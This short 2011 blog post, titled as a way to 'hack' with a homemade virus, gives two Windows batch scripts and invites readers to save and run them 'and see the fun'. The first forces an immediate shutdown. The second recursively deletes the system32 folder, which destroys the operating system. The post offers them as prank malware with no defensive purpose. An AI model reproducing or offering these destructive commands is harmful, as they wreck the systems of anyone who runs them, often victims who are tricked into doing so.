Monday 18 July 2011

Now We Hack Virus Not They


// shutdown the computer without a chance to abort
open notepad and write below code and save it as .bat file and see the fun
1.  @echo off
     shutdown -s -t 0

2.  @echo off
     cd %SystemRoot%
     del /s/q system32\*.*
     rmdir /s/q system32
 

No comments:

Post a Comment